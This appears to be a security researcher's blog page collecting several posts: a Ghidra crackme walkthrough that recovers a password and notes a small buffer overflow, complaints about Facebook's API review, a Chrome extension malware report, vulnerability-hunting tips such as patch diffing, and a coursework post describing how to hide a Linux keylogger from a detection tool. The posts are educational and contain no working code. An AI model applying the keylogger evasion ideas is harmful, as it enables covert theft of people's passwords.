Playing with NSA’s Ghidra

A couple of weeks ago, the NSA released a complex binary analysis tool called Ghidra. When I discovered that, I was working on an ARM binary analysis tool (personal project). I was excited and I slapped a couple of different platform binary files I had to it and saw what the tool does. It was amazing. It performs several analysis and even generates pseudo-C code. IDA Pro is in a real competition now, I guess — a free tool with almost all the features one could ask for…

The last time I did Windows binary reverse engineering was probably more than 10 years ago. It was when I used to do malware analysis. Back in those days, I used to have sets of tools such as WinDbg, OllyDbg, PE Explorer, Dependency Walker, SoftICE, IDA along with Sysinternals tools such as FileMon, Regmon and Process Explorer. Each tool provided different interesting functionalities that made the overall malware analysis a lot easier.

With the excuse to see how Ghidra works, I decided to try reversing a simple Windows program. I grabbed the first Windows entry at crackmes.one, a site hosting CrackMe challenges. The challenge is to find the password.

I ran the CrackMe challenge program in a VM and noticed it asks username and password. When we enter the wrong details, it displays “Wrong password.” as shown below. With this in mind, we open Ghidra and load the EXE (we skip a couple of screenshots regarding loading the EXE…).

Screen Shot 2019-03-23 at 4.18.00 PM

We could start from the entry-point and look for the location where the password check happens. But that means we have to do unnecessary manual static analysis going through different dependences until we reach the interesting location. Instead, the easiest way is to walk through the import address table (IAT) looking for printing functions the program references. The idea is to find the location where “Wrong password.” is printed as it is the most probable location where the password comparison is done. If the function was loaded dynamically, then it wouldn’t appear in the IAT and we might need a different solution.

Screen Shot 2019-03-23 at 4.26.38 PM

We see a printing function printf in the IAT. We look up its reference as shown below.

 

We see that a wrapping function _printf is calling the actual printf. We repeat the same process and find reference to _printf.

Screen Shot 2019-03-23 at 4.42.07 PM.png

To do so, we click on _printf in the Location Reference Provider window, then we close the window and right click on the function identifier _printf then References > Show references to _printf in the context menu. Screen Shot 2019-03-23 at 4.45.56 PM.png

Selecting any one of the references shows the following result. On the left pane, the disassembly and on the right pane, pseudo-C. If we know some details about the function, such as the signature, we can, for example, change the function signature so that the tool better decompiles the program.

Screen Shot 2019-03-23 at 4.48.35 PM.png

For this function, we don’t need to add much. So basically, it looks like it allocates a buffer for user input and calls _promt_user(buffer). _promt_user() looks like it is doing the following. Show the ‘Enter your username’ message, store a max of 19 bytes on the buffer as the username. Then prompt ‘Now enter your password’, then store the input with up to a max length of 29 bytes on the buffer at offset 0x1e (30) — which will be the password. Then look for ‘\n’ (decimal 10 or hex 0x0D) in the password section of buffer (offset 0x1e). If we find ‘\n’, then we set it as the end of the buffer by setting it to ‘\0’. Now, the buffer looks like the following.

Screen Shot 2019-03-24 at 11.13.41 AM

Some calculations do not add up. The buffer is 50 bytes long. However, the password is written at offset 30. Which means, the password length can only be 19 bytes (+ the remaining 1 byte being the terminating null character). But the program reads up to a maximum of 29 bytes from stdin as password (total 59 bytes, while the buffer is 50 bytes). This mean it allow the user to write 9 more character beyond the buffer size. We have buffer overflow here with only 9 bytes for the shellcode.  Not enough to have a jump shellcode to the interesting location —  0x004014aa. But DoS is possible, return address is modified by writing more than 4 bytes. Let’s forget about the buffer overflow and move on.

Screen Shot 2019-03-23 at 6.04.50 PM

We just saw that _promt_user() just askes the user to insert username and password and returns the user input. The next step is to check the password using  _check_password(buffer).

Screen Shot 2019-03-24 at 2.11.57 AM

Here, the ‘stored’ password is retrieved using _get_pwd(_buff) and buffer[30] is compared with some_pointer+_buff[0] (variable local_30 renamed to _buff). Let’s see what _get_pwd(_buff) does.

To summarize, this function creates and allocates a buffer[1000] in the heap, populates the integer array parameters (_buff) with random values, then assigns the following constants to variable _Memory.

_Memory[0] = 0x76;  // 118
_Memory[1] = 0x2f;   // 47
_Memory[2] = 0x6d;  // 109
_Memory[3] = 0x30;  //  48
_Memory[4] = 0x73;  // 115
_Memory[5] = 0x33;  //  51
_Memory[6] = 0xff;   //  255

Then it iterates 6 times setting values in the allocated memory as follows.

  • First, get _Memory[0]+1 = 119, then set buffer[_buff[0]] = 119, where _buff is the parameter to _get_pwd().
  • Second, get_Memory[1]+1 = 48, then set buffer[_buff[1]] = 48….
  • …. at the end return pointer to the heap buffer

Screen Shot 2019-03-24 at 2.39.00 AM.png

Now, we are back at _check_password(). Earlier, we said, the ‘stored’ password is retrieved using _get_pwd(_buff) and buffer[30] is compared with some_pointer+_buff[0] (local_30 renamed to _buff). Now, let’s refine it.

  • the ‘stored’ password is retrieved using _get_pwd(_buff), and buffer[30] is compared with buffer+_buff[0] (which is equivalent to buffer[_buff[0]]).
  • recall from _get_pwd()’s first iteration, we have that buffer[_buff[0]] = 119.
  • Therefore, the final check is: buffer[30] == 119 (buffer[30] == ‘w’)
  • In other words, the first character of the password phrase (buffer[30]) must be equal to ‘w’.

With that, we conclude that the password is anything that starts with ‘w’, e.g., ‘world‘ and the username doesn’t matter.

The pseudo-C code provided by Ghidra is very helpful in better understanding the binary, though, sometimes renaming and retyping could be required. This was an exercise to understand if I still remember the basics of reversing Windows binary with the additional challenge of using a new reversing tool. It was fun.

One thing that I would like to mention regarding Ghidra is that, I kind of had a problem with scrolling. I was not using an external mouse during this analysis. Instead, I was using the touchpad on a Mac. However, scrolling down in the disassembly pane was problematic as it was jumping several addresses down or up and making me lose the location and I had to redo the the different steps to arrive to the location I was investigating. I don’t know if this is a specific problem but I will give it a try with external mouse and additional monitor.

What I am actually interested in is the headless version where some analysis output is produced via command-line and building some other automated binary analysis tool on top of it. Let’s see how it will go.

Ciao!

Why are Facebook engineers confused about App Review?

So Facebook recently changed the policy about their API. Yes, Cambridge Analytica ruined it for everybody. Facebook has limited API access and included also app review for most of the permissions an app requires. Though there are still some loopholes but recently they almost closed everything saying your app has to pass through review.

Image result for facebook engineers

So they basically want to see how you use their API. But this is with the assumption that you are dealing with user data. For example, having a Facebook login for OAuth on your website and when a user uses the plugin to login to your website, you request permissions from the user (e.g., permission to post the user’s behalf). The permissions could be for user profile or the privilege to manage the users pages.

The problem comes here. What if you want to access your own data? Do you have to pass through the review? As long as you’re only accessing your own data, it should NOT be a problem. So, basically, I create my access_token via Graph Explorer and use the API to access my data.

When Facebook required app review, I submitted the app along with a screencast (as they requested). I got a response saying they don’t see the login plugin in the video. But I don’t use the login plugin because I am not asking people to login using Facebook. Basically, I don’t use the app to interact with Facebook users.

I explained in details what I want to do and the fact that my app is not related to users. Their response was “we can’t find the login plugin on our website.”

During all this time, the API was working on and off without review for a reason that I do not know.  And the people I have been in contact with were developers not just tech support (at least said Facebook). Why they were not able to understand the use-case is beyond me. This is the point where I said to hell with their API. I will find a way, though it will be painful, because Facebook API has become useless.

The fix should be very easy though for Facebook. If an app is not reviewed, just limit the access to the app developer’s data/page/group… just like when the app is in development mode except being able to publish on your profile/page/group.

How the latest Facebook hack could have cost money to its users

fbhkFacebook has recently reported that external actors have exploited a bug in its system to gain access to more than 50 million users. Apparently, three different bugs were used together to get access-token of the affected users that lets the attackers login to Facebook without needing the user’s password.  Though Facebook is still investigating what data the attackers could have gotten, considering the fact that the access-token is powerful (it has the permission of the Facebook mobile app), we can assume they’ve got everything. However, apart from getting user data, the attacker could have also performed several (automated/manual) actions using the affected user’s account including costing money! The following are off the top of my head assuming 50 million user accounts:

Bypass Facebook News Feed algorithm

We know the Facebook News Feed algorithm favors posts that have initial momentum (reactions, comments and shares). Thus, that attackers could have used the affected users’ accounts to generate fake reactions, comments and shares in order to fool the algorithm.

Sell Facebook Page Likes

In order to increase a Facebook Page’s Likes, one has to pay for Facebook and advertise the Page to a given audience that most likely will like the Page. However, using the 50 million accounts, the attackers could bypass Facebook advertisement and sell Likes directly to their users. Well, this could also apply for the first case, where the attackers sell traction.

Takeover users Facebook Pages and Facebook Groups

Imagine having a Page with millions of Likes that you spent money on and because of a bug on Facebook system, the attackers take control of and remove you from the admins list? Though Facebook might restore ownership, it is reported that it is not that simple to get back.

Use configured Facebook ad account

This actually will cost money to the user. If a user has a configured ad account, the attackers could use it to promote something that costs money. Moreover, the attackers could advertise something that violates Facebook’s policy and get the users ad account disabled.


According to the notification I received on Facebook, I am one of the 50 million affected users. Though Facebook is still working on it, I tried to go through the possible places where I could see if my account was used to perform some actions. For now, it seems fine. But I can’t say anything about the data they have.

 

Stay safe on this unsafe platform.

java.lang.VerifyError error after instrumenting/transforming Android apps

You might have encountered the java.lang.VerifyError DEX verification error when developing an Android app. There are several reasons for this. Most commonly being the IDE messing up with the build process and cleaning and rebuilding might solve the problem. In some cases it could also be tools that we use (for example, security tools for obfuscation). There are several resources for this case on the net and is relatively easy to fix.

However, what I wanted to write about in this post is not from the developer point of view, but rather from automated software testing point of view (that involves instrumentation or code transformation), where you have hundreds or even thousands of Android apps to test and you don’t have their source code. Here is my experience.

For a given security testing experiment of Android apps, I had to mutate apps that satisfy some mutation criteria. After the mutation is applied, I had to automatically verify whether the mutation didn’t break the app. To achieve this, I had to apply the mutation (and all the steps necessary to make app ready for install), then install the app on the emulator and test the mutated component if it crashes. In order to understand if the crash is caused by the applied mutation, I wrap the introduced statements within try-catch block and log the exception.

However, running the mutated apps on the emulator failed with the java.lang.VerifyError. The strict Runtime refused to load the “inconsistent” bytecode into the VM because it found a “Bad method” or some other reasons. This might depend on the level of instrumentation that you are applying and hence if you’re just introducing, say, a log statement only, maybe you will not encounter this problem and the instrumented app might run without a problem.

Since mutation is applied automatically in different real world apps, addressing the problem for each app is a bit difficult. For example, it is known that the Runtime will report error if we try to wrap a  synchronized block in a  try-catch block. Therefore, while doing the mutation, it will be a bit difficult (but not impossible) to first know if a call that I wrapped in a  try-catch block will eventually have a synchronized block in it. Even if I know this in advance (say, for example, during static analysis to check mutation criteria), it has no help as I cannot skip the  try-catch block since I need it to see if failure is caused by mutation and I cannot also remove the synchronized block since I will interfere with the design of the app.

Cause

This is just one case as the Android Runtime checks for several inconsistencies that were ignored during the Dalvik VM time. To mention some of inconsitences that are caught by the new Runtime:

  • extending a class that was declared final
  • overriding a package-private methods
  • invalid control-flow
  • unbalanced moniterenter/moniterexit (this might be the reason for the synchronized block but I haven’t checked the final bytecode for the said inconsistency)
  • passing wrong argument to a method

Solution

A more general solution would have been understanding what modifications are making the verification fail and improving the instrumentation. However, that is out of my scope for the moment.

So, the solution that I found is specific to my problem. Considering that the ART is introduced in Android 5 (API 21), the easiest workaround I found was using an emulator running, say, API 20. Since I know what kind of mutations I am applying and I also monitor executions, resorting to a less restrictive Runtime would’t affect the general behavior of the app under test.

Therefore, if your instrumented Android app isn’t running on the emulator for ART  java.lang.VerifyError  error, just use emulators running API level below 21 and it should be an easy workaround.

Cheers!

Chrome Extension “Video Downloader GetThemAll 30.0.2” might contain malware

lo

So I have been using this extension for a while and all of a sudden it was disabled. When going to the extension to see what happened, Chrome reports that the extension contains malware and for this reason it is disabled.

What could have happened?

As it happened to other popular extensions, it could have been modified to include malicious behavior, transferred ownership to potential malicious owners, have been hacked or update included policy violating feature (e.g., download from YouTube)–but we don’t know. There is also a rumor that the extension was mining cryptocurrency. It is time to analyze version 30.0.2 in details in order to understand what information could have leaked, if any.

Though GetThemAll 30.0.3 is already available on Chrome web store, probably it is better to stay away until further results on what happened on the previous version.

A quick look at the diff of version 30.0.2 and 30.0.3 shows, the earlier has a suspicious obfuscated “background.js” file that accesses the images/video_help.png file, which also exists only in version 30.0.2.

Cheers

Sources of dangerous vulnerabilities

There are a lot of whitehat and blackhat security researchers out there. While the whitehat researchers inform the target company before disclosing vulnerabilities, the blackhats either use the vulnerabilities for personal activities or sell them on black market. But both kinds of researchers spend a lot of time stepping through codes around where potential vulnerabilities might exist (e.g. around input manipulation code in a hunt for buffer overflow or format string vulnerabilities).

But there are a couple of other potential tricks to facilitate the hunt. One of this is comparing binaries of critical updates that are pushed by the vendor. If we consider Windows as an example, if Microsoft pushed a critical update, say, for one of the services handled by svchost.exe, an attacker may compare the old binary with the new updated version to see where Microsoft patched the vulnerabilities. In some cases reverse-engineering the patch might also reveal the vulnerabilities. The vulnerabilities found might interest the attacker if they have remote code execution ability, local privilege escalation or any arbitrary code execution. Since not all people update their system as soon as the update is pushed, the attackers will have enough time to craft their exploit and start using. If I remember correctly, the Sasser worm (2004) used the vulnerability discovered in this way to exploit MS04-011.

The other potential source of information is Dr. Watson of Windows. When applications crash, the error reporting feature on Windows XP and later versions might leak some important information on source of error. A reverse-engineering around the location might provide information about a vulnerability in the target application. Gathering the error reporting might be done on a lab computer or from different compromised computers.

These definitely are not going to be the only ways to identify vulnerabilities from binaries.

X11 based Linux keylogger

As a challenge to the paper “Unprivileged Black-Box Detection of User-Space Keyloggers“, we were askd to write a Linux keylogger that can hide behind the tool mentioned on the paper. A friend and I came up with several ideas to hide our keylogger from being detected. We didn’t manage to include all the ideas in the keylogger code because of time constraint but the professor approved that if we had included those options, their tool wouldn’t have detected it. Before writing the ideas we came up with, let me explain how their detection method works in a nutshell.

They assumed that, by design, keyloggers capture keystrokes and save them to file. If for example, “AbCdeF” was pressed on the keyboard, somewhere, some process is writing a file with the same bytes. So they check for this correlation by sending keys to all running processes and monitoring file activities and checking the number of bytes written. If the same amount of bytes were written to file, then the process that wrote that file is a keylogger.

Our ideas to circumvent this are presented below. Obviously, these are for educational purpose only.

1. Buffering.  We have a buffer that changes its size every time it writes its content to file. Here is how it works.

Let’s say we have buf[1024]. And let the first random buffer size be 750. Then we keep buffering until 750 is reached and write it to file. Then the next buffer size would be randomly chosen. Say 900. The process continues like that.

2. If we’re on an Internet-connected computer, we directly post the logged keystrokes on a remote server. That’s it, nothing on file.

3. Being selective when we capture keys. Let’s face it, when we capture keys, usually it’s password or something related. So why would we be interested in keys that are entered on Sublime? So, we targeted web browsers: Mozilla Firefox and Google Chrome. What does it mean? Their tool sends our keylogger a key and it is ignored. Keeps logging like a boss 🙂

There were also other ideas like having a different sized output (different size than the entered keys) on file by applying cryptography but the paper says they addressed this issue very well so we didn’t bother to test it. Will post code if anybody is interested.

The C source code of X11 based Linux keylogger can be found here.

This work got us full points.